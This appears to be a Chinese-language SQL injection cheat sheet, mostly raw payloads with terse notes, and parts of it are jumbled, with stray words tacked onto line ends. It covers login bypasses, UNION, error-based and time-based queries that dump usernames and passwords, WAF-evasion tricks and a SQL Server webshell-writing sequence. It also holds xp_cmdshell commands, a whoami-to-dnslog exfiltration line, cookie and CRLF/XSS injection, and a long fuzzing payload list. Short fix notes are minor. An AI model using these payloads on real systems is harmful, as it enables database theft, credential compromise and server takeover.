‘ username #username是否過濾'
' root #password是否過濾'
"username: root
password: '" 以root帳號登陸(針對對查詢結果是否有值作了判斷的狀況)
root' and 1=1;# 空/任意 以admin帳號登陸(針對對查詢結果是否有值作了判斷的狀況)
admin' and 1=1;# 空/任意 "以空帳號登陸
and 1=1;# 空/任意 查詢語句結果爲空,判斷語句爲:查詢出的密碼=輸入的密碼
and 1=1;# 空php
用戶名輸入框中輸入:’ or 1=1#,密碼隨便輸入(mysql5.7.21中不成立:輸出報錯--)
' rlike (select (case when (1=1) then 1 else 0x28 end)) and '1'='1' or '1'='1
select @@secure_file_priv; --查看是否能夠導入導出,爲NUll表示不容許,爲空表示容許
load data infile 'c:\\xxx\\xxx\\xxx.txt' into table a; --mysql3.x讀取方法
select * from user where id=1 and 1=2 union select 1,2,3; --判斷表列數(這裏判斷是否爲3列)html
select * from user where id=1 and 1=2 union select version(),1,2; --判斷表列數+版本號(這裏判斷是否爲3列)java
select * from user where id=1 and 1=2 union select version(),database(),2; ----判斷表列數+版本號+數據庫名(這裏判斷是否爲3列)python
select * from user where id=1 and 1=2 union select version(),database(),user(); ----判斷表列數+版本號+數據庫名+用戶名(這裏判斷是否爲3列)mysql
select * from user where id=1 and 1=2 union select 1,2,schema_name from information_schema.schemata;(查詢全部數據庫)web
select * from user where id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata;(查詢全部數據庫)正則表達式
select * from user where id=1 and 1=2 union select 1,2,group_concat(convert(schema_name using latin1)) from information_schema.schemata;sql
and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() ---(根據庫名查看錶名稱)chrome
and 1=2 union select 1,2,group_concat(conver t(table_name using latin1)),4,5,6,7,8,9,
10,11,12,13,14,15 from information_schema.tables where table_schema=database() ---(根據庫名查看錶名稱)
mysql> select column_name from information_schema.columns where table_name=0x75736572; ----(根據表名查看列名,表名爲16進制編碼,需注意此處可能出現多張同名的表)
union select 1,2,group_concat(convert(column_name using latin1)),4,5,6,7,8,9,10,
11,12,13,14,15 from information_schema.columns where table_name=0x636D735F7573 --(根據表名查看列名,表名爲16進制編碼,需注意此處可能出現多張同名的表)
and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,
11,12,13,14,15 from cms.cms_users --(根據庫、表、列查看用戶名和密碼,之間用加號分隔)
and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,
11,12,13,14,15 from cms.cms_users --(根據庫、表、列查看用戶名和密碼)
select table_name from information_schema.tables; --(mysql查看數據庫中的總表數目)
and (select count (*) from user_tables>0 (oracle查看數據庫中的總表數目)
select count(*) from information_schema.tables --(mysql查看全部數據庫中的表總數)
mysql> select table_schema,count(*) from information_schema.tables group by table_schema --(查詢數據庫中每個庫對應的表數目)
mysql> select table_name,table_schema from information_schema.tables where table
' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users’--+
select * from (select name_const(version(),1))a; --查看數據庫版本
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x; --利用數據庫報錯信息查看數據庫版本
update web_ids set host='www.0x50sec.org' where id =1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (語句)),1,62)))a from information_schema.tables group by a)b);
insert into web_ids(host) values((select (1) from mysql.user where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (語句)),1,62)))a from information_schema.tables group by a)b)));
SQL注入登陸框 - 萬能密碼 - ASP
'or''=' | 'or''=' root' or 'afs'<>'1sa | empty - Arbitrary
SQL注入登陸框 - 萬能密碼 - PHP
'or 1=1/*
or 1=1#/*
admin' or 'a'='a -- admin'報錯 - 》 admin''正常 -》
SQL注入搜索框 - 數字型 - PHP
?cid=211 and 1=1 ?cid=211 and 1=2
?type=2 and (select 1 from(select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)y)%23
SQL注入搜索框 - 數字型- PHP -》select被過濾-》使用%2b配合mysql內置函數注入
http://www.xx.com/content_cygs.php?NID=240 http://www.xx.com/content_cygs.php?NID=235%2b(substring(@@version,1,1)) http://www.xx.com/content_cygs.php?NID=239%2b(substring(@@version,3,1)) http://www.xx.com/content_cygs.php?NID=234%2b(substring(@@version,5,1)) http://www.xx.com/content_cygs.php?NID=239%2bsubstring(ascii(substring(user(),1,1)),1,1)
SQL注入搜索框 - 字符型- PHP
php?city=zhongshan' and 1=(case when 1=1 then 1 else(select 1 from information_schema.tables)end)and'a'='a php?city=zhongshan' and 0=(case when 1=1 then 1 else(select 1 from informatino_schema.tables)end)and'a'='a
大小寫轉換法 SQL:sEleCt vERsIoN(); 特殊字符構造法 select `version`(); 編碼繞過(常見的SQL編碼有unicode、HEX、URL、ascll、base64等) SQL:load_file(0x633A2F77696E646F77732F6D792E696E69) 拼湊法(利用waf的不完整性,只驗證一次字符串或者過濾的字符串並不完整) SQL:selselectect verversionsion();
SQL注入 - 字段繞過 - 單引號繞過1
侷限性:(1)服務端採用GBK編碼(2)數據傳輸時對字符進行url編碼 root%d5' or 1=1;# 空/任意 addslashes -> urldecode <?php $user = $_GET['username']; $pass = $_GET['password']; $con=mysqli_connect("localhost","root","root","test"); if (mysqli_connect_errno($con)) { echo "鏈接 MySQL 失敗: " . mysqli_connect_error(); } $adsuser = addslashes($user); $adsuser1 = urldecode($adsuser); $sql="SELECT * FROM user where username='$adsuser1'"; echo $sql; $result = mysqli_query($con,$sql); $arr = (mysqli_fetch_row($result)); if(is_array($arr)){ header("Location:manager.html"); }else { echo "Please Login Again!"; header("Refresh:2;url=Login.html"); } ?>
SQL注入 - 字段繞過 - 單引號繞過2
root %27 and 1=1;# 空/任意 addslashes -> urldecode (配合瀏覽器 --瀏覽器會首先作一次urldecode) <?php $user = $_GET['username']; $pass = $_GET['password']; $con=mysqli_connect("localhost","root","root","test"); if (mysqli_connect_errno($con)) { echo "鏈接 MySQL 失敗: " . mysqli_connect_error(); } $adsuser = addslashes($user); $adsuser1 = urldecode($adsuser); $sql="SELECT * FROM user where username='$adsuser1'"; echo $sql; $result = mysqli_query($con,$sql); $arr = (mysqli_fetch_row($result)); if(is_array($arr)){ header("Location:manager.html"); }else { echo "Please Login Again!"; header("Refresh:2;url=Login.html"); } ?>
SQL注入 - 字段繞過 - 單引號繞過3
root %2527 and 1=1;# 空/任意 and 通常會考慮轉換爲 && 內聯註釋繞過: /*!1*/=/*!2*/ id=1 and/*!1=1*/
SQL注入 - 字段繞過 - and繞過
空格過濾轉換爲 %0a 、+ 或者 /**/
SQL注入 - 字段繞過 - 空格繞過
等號轉換爲 like greatest between 這些在sqlmap 都有相應的tamper
SQL注入 - 字段繞過 - 等號繞過
SQL注入 - 字段繞過 - select繞過
and (select count(*) from admin) >=0 --(猜表名) and (select count (user) from admin ) >=0 --(猜列名) select * from user where id=3 and (select count(id) from user) > 3; --(猜列對應的行數,此處3返回正常頁面表示可繼續加1,直到頁面不顯示內容) and (select top 1 len (列名) from 表名) >0 --(sqlserver中猜列名中的第一列對應的字符數) and (select len (列名) from 表名 limit 1) >0 --(mysql中猜列名中的第一列字段對應的字符數) and (select top 1asc (mid (user,1,1)) from admin) >96 ——(猜字段的Ascii值,mysql報錯) "mysql> select * from user where id=1 and ascii(substring((select id from user where id=1),1,1))=49; --(mysql猜字段的Ascii值)" select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^u[a-z]' limit 0,1); select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1); select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 0,1); select 1 from user where id regexp '^[1-9]' limit 6; --(列名用正則表達式表示) select char(97) --(ascii轉換爲字符a) select ascii('a') --(a取ascii值) select ord('a'); ----(a取ascii值) select left(database(),2); ---取數據庫名的前兩個字符
數據庫名判斷 mysql> select * from users where id=1 union select mid(database(),1,2),1,2; --根據查詢列數判斷數據庫名稱 "關鍵字: union select mid database ()
繞過字段: and
數據庫名判斷(暴力猜解) "mysql> select * from users where id=1 and sleep(if((mid(database(),1,1)='s'),2,0
));" "關鍵字:and sleep if mid database () = '
繞過字段: union select
數據庫名判斷 mysql> select * from users where id=1 and length(database())>7; --長度大於7判斷 "關鍵字: and length database () >
繞過字段: select =
當前user()/database() "mysql> select * from users where id =1 and (select 1 from (select count(*),conca
t(user(),floor(rand(0)*2))x from users group by x)a);
ERROR 1062 (23000): Duplicate entry 'root@1' for key '<group_key>'"
updatexml "UPDATEXML (XML_document, XPath_string, new_value);
第二個參數:XPath_string (Xpath格式的字符串) ,若是不瞭解Xpath語法,能夠在網上查找教程。
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'"
當前user()/database() http://www.hackblog.cn/sql.php?id=1 and (select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
暴庫 http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
暴表 http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段內容 http://www.hackblog.cn/sql.php?id=1 and mysql> select updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) from users limit 0,1),0x7e),1);
爆數據庫名 "mysql> select * from user where id=1 and username = 'root' and (extractvalue('anything',concat('~',(select database()))));
select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5))))"
爆表' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
爆字段' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
爆值' union select 1,group_concat(username,0x3a,password),3 from users--+
爆表' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
爆字段 "' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','us')))) --+' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','us','user','password','avatar','last_login')))) --+"
爆值 "' and 1=extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+' and 1=extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+"
select updatexml(1,make_set(3,0x7e,(select user())),1);
select updatexml(1,lpad('@',30,(select user())),1);
mysql> select updatexml(1,repeat((select user()),2),1);
mysql> select updatexml(1,reverse((select user())),1);
mysql> select updatexml(1,export_set(1|2,'::',(select user())),1);
sleep 當前用戶名判斷 select if(user()='root@',sleep(2),null); --用戶名判斷 (刷新時間能夠經過瀏覽器的開發者選項f12來看,或者使用Firefox的firebug插件,或者burpsuite等工具) "關鍵字: union select if user () = ' sleep 繞過字段: and " 數據庫名判斷 mysql> select * from users where id=1 and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))=113,sleep(2),null); --暴力猜解當前數據庫中的數據庫名,此處猜解當前數據庫在第四個數據庫且數據庫首字母的ascii是爲113(q) "關鍵字: and if ascii substr select schema_nameinformation limit = sleep () 繞過字段:union (select) " 表名判斷 mysql> select * from users where id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(2),null); --暴力猜解當前數據庫security中第四張表的首字母爲u "關鍵字:and if ascii substr select information_schema where = ' limit = sleep () 繞過字段:union (select) " 列名判斷 "mysql> select * from users where id=1 and if(ascii(substr((select column_name f rom information_schema.columns where table_schema='security' and table_name='use rs' limit 0,1),1,1))=105,sleep(2),null); Empty set (2.00 sec) --暴力猜解當前數據庫security,users表第1列字段的首字母爲i" "關鍵字:and if ascii substr select information_schema where = ' limit sleep () 繞過字段:union (select) " 字段值判斷 "mysql> select * from users where id=1 and if(ascii(substr((select password from security.users limit 0,1),1,1))=68,sleep(2),null); --暴力猜解當前數據庫security,users,password列第一列字段的首字母爲D " "關鍵字:and if ascii substr select from limit = sleep () 繞過字段:union (select) " 數據庫名稱長度判斷 mysql> select * from users where id=1 and sleep(if((length(database())=8),0,3)); "關鍵字: and sleep if length database () = 繞過字段: select "
語言/框架中注入漏洞整理 - Java
java.sql.preparedstatement --不存在(推薦使用類)
"String sql = ""select * from user_table where username=
' ""+userName+"" ' and password=' ""+password+"" '"";"
繞過方法:‘or 1 = 1 –
"SELECT * FROM user_table WHERE
username='' ;DROP DATABASE (DB Name) --' and password='' 刪除數據庫"
String sql = 「select id,no from user where id=」 + id;
繞過方法:1 or 1 = 1
select id,no from user where id=1 or 1=1
語言/框架中注入漏洞整理 - Python
python中sql存在注入狀況: "sql = ""select id, name from test where id=%d and name='%s'"" %(id, name) cursor.execute(sql)" "修復: args = (id, name) sql = ""select id, name from test where id=%s and name=%s"" cursor.execute(sql, args)" "sql = ""select id, name from test where id=""+ str(id) +"" and name='""+ name +""'"" cursor.execute(sql)" "修復: name = MySQLdb.escape_string(name) sql = ""select id, name from test where id=%d and name='%s'"" %(id, name) cursor.execute(sql)"
BSQL Hacker 1.支持SQL盲注;2.可自動對Oracle和MySQL數據庫進行攻擊 3.自動提取數據庫的數據和架構 The Mole 1.開源 2.可繞過IPS/IDS; 3.攻擊範圍包括SQL Server、MySQL、Postgres和Oracle Pangolin 1.支持Access、MSSql、MySql、Oracle、Informix、DB二、Sybase、PostgreSQL、Sqlite 2.從檢測注入開始到最後控制目標系統都給出了測試步驟 3.國內使用率最高的SQL注入測試的安全軟件
' 1=1 1=2 猜解表名 and exists(select * from admin) 猜解列名 and exists(select admin from admin) 猜想字段內容 and (select top 1 len(admin) from admin)>n and (select top 1 asc(mid(admin,1,1)) from admin)>c Webshell寫入 create table cmd (a varchar(50)) insert into cmd (a) values ('一句話木馬') select * into [a] in 'e:\host\chouwazi.com\web\data\xiao.asp;xiao.xls' 'excel 4.0;' from cmd drop table cmd
and (select count(*) from user_tables)=5-- and 1=2 union select 1,2,table_name,'4','5',null,7,1 from user_tables and (SELECT count(*) FROM USER_TAB_COLUMNS WHERE table_name='XBLOUSER' )>0 and 1=2 union select 1,2,COLUMN_NAME,'4','5',null,7,1 from (select * from (SELECT COLUMN_NAME FROM USER_TAB_COLUMNS WHERE table_name='XBLOUSER' order by 1 asc ) WHERE ROWNUM<=3 ORDER BY 1 DESC) WHERE ROWNUM<=1 -- Param_list:CommandName=getAppVersion) AND 9533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(120)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9533=9533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (5159=5159
Param_list:CommandName=getAppVersion%' AND 7784=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7784=7784) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(122)+CHAR(113))) AND '%'=' (沒整明白其做用,convert用法正確)
Param_list:CommandName=getAppVersion\xCF' AND 7784=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7784=7784) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(122)+CHAR(113))) limit 10# Param_list:CommandName=getAppVersion\xCF' AND 7784=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7784=7784) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(122)+CHAR(113))) limit 10#
獲取計算機名 for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info 獲取用戶名 for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.info
直接使用Request獲取參數如:SID=Request("ID"),先取Get值,再取Post值,而後取Cookie值 http://www.xxx.com/1.asp?id=123 若是咱們只輸 http://www.xxx.com/1.asp 時,就不能看到正常的數據,由於沒有參數! 咱們想知道有沒有Cookies問題(也就是有沒有Request("XXX")格式問題), 先用IE輸入 http://www.xxx.com/1.asp 加載網頁,顯示不正常(沒有輸參數的緣由) 以後在IE輸入框再輸入 javascript:alert(document.cookie="id="+escape("123")); 按回車,你會看到彈出一個對話框 內容是: id=123 以後,你刷新一個網頁,若是正常顯示,表示是用 Request("ID") 這樣的格式收集數據~~~~,這種格式就能夠試Cookies注入 在輸入框中輸入 javascript:alert(document.cookie="id="+escape("123 and 3=3")); 刷新頁面,若是顯示正常,能夠再試下一步(若是不正常,就有可能也有過濾了) javascript:alert(document.cookie="id="+escape("123 and 3=4"));刷新一下頁面 若是不正常顯示,這就表示有注入
通常網站會在HTTP頭中用Location: http://baidu.com這種方式來進行302跳轉,因此咱們能控制的內容就是Location:後面的XXX某個網址。 因此一個正常的302跳轉包是這樣: HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://www.sina.com.cn 但若是咱們輸入的是 http://www.sina.com.cn%0aSet-cookie:JSPSESSID%3Dwooyun 注入了一個換行,此時的返回包就會變成這樣: HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://www.sina.com.cn Set-cookie: JSPSESSID=wooyun 這個時候這樣咱們就給訪問者設置了一個SESSION,形成一個「會話固定漏洞」。 好比一個網站接受url參數http://test.sina.com.cn/?url=xxx,xxx放在Location後面做爲一個跳轉。若是咱們輸入的是: http://test.sina.com.cn/?url=%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)> 咱們的返回包就會變成這樣: HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: <img src=1 onerror=alert(/xss/)> 瀏覽器會根據第一個CRLF把HTTP包分紅頭和體,而後將體顯示出來。因而這裏<img>這個標籤就會顯示出來,形成一個XSS。 瀏覽器的Filter是瀏覽器應對一些反射型XSS作的保護策略,當url中含有XSS相關特徵的時候就會過濾掉不顯示在頁面中,因此不能觸發XSS。 怎樣才能關掉filter?通常來講用戶這邊是不行的,只有數據包中http頭含有X-XSS-Protection而且值爲0的時候,瀏覽器纔不會開啓filter。 說到這裏應該就很清楚了,HRS不正是注入HTTP頭的一個漏洞嗎,咱們能夠將X-XSS-Protection:0注入到數據包中,再用兩個CRLF來注入XSS代碼,這樣就成功地繞過了瀏覽器filter,而且執行咱們的反射型XSS。 因此說HRS的危害大於XSS,由於它能繞過通常XSS所繞不過的filter,並能產生會話固定漏洞。 某分站含有一個url跳轉漏洞,危害並不大,因而我就想到了CRLF Injection,測試 http://xxx.xx.com.cn/?url=%0a%0d%0a%0d%3Cimg%20src=1%3E 的時候,發現圖片已經輸出在頁面中了,說明CRLF注入成功了: 那麼咱們就注入一個X-XSS-Protection:0到數據包中,看看什麼效果: @mramydnei 還想到了一個利用字符編碼來繞過XSS Filter的方法,當編碼是is-2022-kr時瀏覽器會忽略%0f,這樣咱們在onerror後面加個%0f就能繞過filter,前提是注入一個<meta charset=ISO-2022-KR>: 固然,在Location:這裏注入只有webkit內核瀏覽器纔可以利用,其餘瀏覽器可能會跳轉、出錯。不過對於chrome的使用量來講,危害已經足夠了。 如何修復HRS漏洞,固然是過濾\r 、\n之類的換行符,避免輸入的數據污染到其餘HTTP頭。
sqlmap.py -d mysql://root:root@ --sql-shell
X-Forwarded-for: 正常 X-Forwarded-for:’ 報錯 X-Forwarded-for:' and 1=1# 正常 X-Forwarded-for:' and 1=2# 報錯
可用於判斷過濾 http://xx.xx.86.145:90/index.php?id=1'^(length('union')=5)%23 當union被過濾時1^0 輸出id=1 當union沒被過濾時 1 ^ 1 輸出 id=0 回顯 error
1 )%20or%20('x'='x 2 %20or%201=1 3 ; execute immediate 'sel' || 'ect us' || 'er' 4 benchmark(10000000,MD5(1))# 5 update 6 ";waitfor delay '0:0:__TIME__'-- 7 1) or pg_sleep(__TIME__)-- 8 ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 9 "hi"") or (""a""=""a" 10 delete 11 like 12 " or sleep(__TIME__)# 13 pg_sleep(__TIME__)-- 14 *(|(objectclass=*)) 15 declare @q nvarchar (200) 0x730065006c00650063 ... 16 or 0=0 # 17 insert 18 1) or sleep(__TIME__)# 19 ) or ('a'='a 20 ; exec xp_regread 21 *| 22 @var select @var as var into temp end -- 23 1)) or benchmark(10000000,MD5(1))# 24 asc 25 (||6) 26 "a"" or 3=3--" 27 " or benchmark(10000000,MD5(1))# 28 # from wapiti 29 or 0=0 -- 30 1 waitfor delay '0:0:10'-- 31 or 'a'='a 32 hi or 1=1 --" 33 or a = a 34 UNION ALL SELECT 35 ) or sleep(__TIME__)=' 36 )) or benchmark(10000000,MD5(1))# 37 hi' or 'a'='a 38 0 39 21 % 40 limit 41 or 1=1 42 or 2 > 1 43 ")) or benchmark(10000000,MD5(1))# 44 PRINT 45 hi') or ('a'='a 46 or 3=3 47 ));waitfor delay '0:0:__TIME__'-- 48 a' waitfor delay '0:0:10'-- 49 1;(load_file(char(47,101,116,99,47,112,97,115, ... 50 or%201=1 51 1 or sleep(__TIME__)# 52 or 1=1 53 and 1 in (select var from temp)-- 54 or '7659'='7659 55 or 'text' = n'text' 56 -- 57 or 1=1 or ''=' 58 declare @s varchar (200) select @s = 0x73656c6 ... 59 exec xp 60 ; exec master..xp_cmdshell 'ping'-- 61 3.10E+17 62 " or pg_sleep(__TIME__)-- 63 x' AND email IS NULL; -- 64 & 65 admin' or ' 66 or 'unusual' = 'unusual' 67 // 68 truncate 69 1) or benchmark(10000000,MD5(1))# 70 \x27UNION SELECT 71 declare @s varchar(200) select @s = 0x77616974 ... 72 tz_offset 73 sqlvuln 74 "));waitfor delay '0:0:__TIME__'-- 75 ||6 76 or%201=1 -- 77 %2A%28%7C%28objectclass%3D%2A%29%29 78 or a=a 79 ) union select * from information_schema.tables; 80 PRINT @@variable 81 or isNULL(1/0) /* 82 26 % 83 " or "a"="a 84 (sqlvuln) 85 x' AND members.email IS NULL; -- 86 or 1=1-- 87 and 1=( if((load_file(char(110,46,101,120,11 ... 88 0x770061006900740066006F0072002000640065006C00 ... 89 %20'sleep%2050' 90 as 91 1)) or pg_sleep(__TIME__)-- 92 /**/or/**/1/**/=/**/1 93 union all select @@version-- 94 ,@variable 95 (sqlattempt2) 96 or (EXISTS) 97 t'exec master..xp_cmdshell 'nslookup www.googl ... 98 %20$(sleep%2050) 99 1 or benchmark(10000000,MD5(1))# 100 %20or%20''=' 101 ||UTL_HTTP.REQUEST 102 or pg_sleep(__TIME__)-- 103 hi' or 'x'='x'; 104 ") or sleep(__TIME__)=" 105 or 'whatever' in ('whatever') 106 ; begin declare @var varchar(8000) set @var=' ... 107 union select 1,load_file('/etc/passwd'),1,1,1; 108 0x77616974666F722064656C61792027303A303A313027 ... 109 exec(@s) 110 ) or pg_sleep(__TIME__)-- 111 union select 112 or sleep(__TIME__)# 113 select * from information_schema.tables-- 114 a' or 1=1-- 115 a' or 'a' = 'a 116 declare @s varchar(22) select @s = 117 or 2 between 1 and 3 118 or a=a-- 119 or '1'='1 120 | 121 or sleep(__TIME__)=' 122 or 1 --' 123 or 0=0 #" 124 having 125 a' 126 " or isNULL(1/0) /* 127 declare @s varchar (8000) select @s = 0x73656c ... 128 â or 1=1 -- 129 char%4039%41%2b%40SELECT 130 order by 131 bfilename 132 having 1=1-- 133 ) or benchmark(10000000,MD5(1))# 134 or username like char(37); 135 ;waitfor delay '0:0:__TIME__'-- 136 " or 1=1-- 137 x' AND userid IS NULL; -- 138 */* 139 or 'text' > 't' 140 (select top 1 141 or benchmark(10000000,MD5(1))# 142 ");waitfor delay '0:0:__TIME__'-- 143 a' or 3=3-- 144 -- &password= 145 group by userid having 1=1-- 146 or ''=' 147 ; exec master..xp_cmdshell 148 %20or%20x=x 149 select 150 ")) or sleep(__TIME__)=" 151 0x730065006c0065006300740020004000400076006500 ... 152 hi' or 1=1 -- 153 ") or pg_sleep(__TIME__)-- 154 %20or%20'x'='x 155 or 'something' = 'some'+'thing' 156 exec sp 157 29 % 158 ( 159 ý or 1=1 -- 160 1 or pg_sleep(__TIME__)-- 161 0 or 1=1 162 ) or (a=a 163 uni/**/on sel/**/ect 164 replace 165 %27%20or%201=1 166 )) or pg_sleep(__TIME__)-- 167 %7C 168 x' AND 1=(SELECT COUNT(*) FROM tabname); -- 169 '%20OR 170 ; or '1'='1' 171 declare @q nvarchar (200) select @q = 0x770061 ... 172 1 or 1=1 173 ; exec ('sel' + 'ect us' + 'er') 174 23 OR 1=1 175 / 176 anything' OR 'x'='x 177 declare @q nvarchar (4000) select @q = 178 or 0=0 -- 179 desc 180 ||'6 181 ) 182 1)) or sleep(__TIME__)# 183 or 0=0 # 184 select name from syscolumns where id = (sele ... 185 hi or a=a 186 *(|(mail=*)) 187 password:*/=1-- 188 distinct 189 );waitfor delay '0:0:__TIME__'-- 190 to_timestamp_tz 191 ") or benchmark(10000000,MD5(1))# 192 UNION SELECT 193 %2A%28%7C%28mail%3D%2A%29%29 194 +sqlvuln 195 or 1=1 /* 196 )) or sleep(__TIME__)=' 197 or 1=1 or ""= 198 or 1 in (select @@version)-- 199 sqlvuln; 200 union select * from users where login = char ... 201 x' or 1=1 or 'x'='y 202 28 % 203 â or 3=3 -- 204 @variable 205 or '1'='1'-- 206 "a"" or 1=1--" 207 //* 208 %2A%7C 209 " or 0=0 -- 210 ")) or pg_sleep(__TIME__)-- 211 ? 212 or 1/* 213 ! 214 ' 215 or a = a 216 declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 217 declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 218 declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 219 declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 220 ' or 1=1 221 or 1=1 -- 222 x' OR full_name LIKE '%Bob% 223 '; exec master..xp_cmdshell 'ping'-- 224 '%20or%20''=' 225 '%20or%20'x'='x 226 ')%20or%20('x'='x 227 ' or 0=0 -- 228 ' or 0=0 # 229 or 0=0 #" 230 ' or 1=1-- 231 ' or '1'='1'-- 232 ' or 1 --' 233 or 1=1-- 234 ' or 1=1 or ''=' 235 or 1=1 or ""= 236 ' or a=a-- 237 or a=a 238 ') or ('a'='a 239 'hi' or 'x'='x'; 240 or 241 procedure 242 handler 243 ' or username like '% 244 ' or uname like '% 245 ' or userid like '% 246 ' or uid like '% 247 ' or user like '% 248 '; exec master..xp_cmdshell 249 '; exec xp_regread 250 t'exec master..xp_cmdshell 'nslookup www.google.com'-- 251 --sp_password 252 ' UNION SELECT 253 ' UNION ALL SELECT 254 ' or (EXISTS) 255 ' (select top 1 256 '||UTL_HTTP.REQUEST 257 1;SELECT%20* 258 <>"'%;)(&+ 259 '%20or%201=1 260 'sqlattempt1 261 %28 262 %29 263 %26 264 %21 265 ' or ''=' 266 ' or 3=3 267 or 3=3 -- 268 sleep(__TIME__)# 269 1 or sleep(__TIME__)# 270 " or sleep(__TIME__)# 271 ' or sleep(__TIME__)# 272 " or sleep(__TIME__)=" 273 ' or sleep(__TIME__)=' 274 1) or sleep(__TIME__)# 275 ") or sleep(__TIME__)=" 276 ') or sleep(__TIME__)=' 277 1)) or sleep(__TIME__)# 278 ")) or sleep(__TIME__)=" 279 ')) or sleep(__TIME__)=' 280 ;waitfor delay '0:0:__TIME__'-- 281 );waitfor delay '0:0:__TIME__'-- 282 ';waitfor delay '0:0:__TIME__'-- 283 ";waitfor delay '0:0:__TIME__'-- 284 ');waitfor delay '0:0:__TIME__'-- 285 ");waitfor delay '0:0:__TIME__'-- 286 ));waitfor delay '0:0:__TIME__'-- 287 '));waitfor delay '0:0:__TIME__'-- 288 "));waitfor delay '0:0:__TIME__'-- 289 benchmark(10000000,MD5(1))# 290 1 or benchmark(10000000,MD5(1))# 291 " or benchmark(10000000,MD5(1))# 292 ' or benchmark(10000000,MD5(1))# 293 1) or benchmark(10000000,MD5(1))# 294 ") or benchmark(10000000,MD5(1))# 295 ') or benchmark(10000000,MD5(1))# 296 1)) or benchmark(10000000,MD5(1))# 297 ")) or benchmark(10000000,MD5(1))# 298 ')) or benchmark(10000000,MD5(1))# 299 pg_sleep(__TIME__)-- 300 1 or pg_sleep(__TIME__)-- 301 " or pg_sleep(__TIME__)-- 302 ' or pg_sleep(__TIME__)-- 303 1) or pg_sleep(__TIME__)-- 304 ") or pg_sleep(__TIME__)-- 305 ') or pg_sleep(__TIME__)-- 306 1)) or pg_sleep(__TIME__)-- 307 ")) or pg_sleep(__TIME__)-- 308 ')) or pg_sleep(__TIME__)--
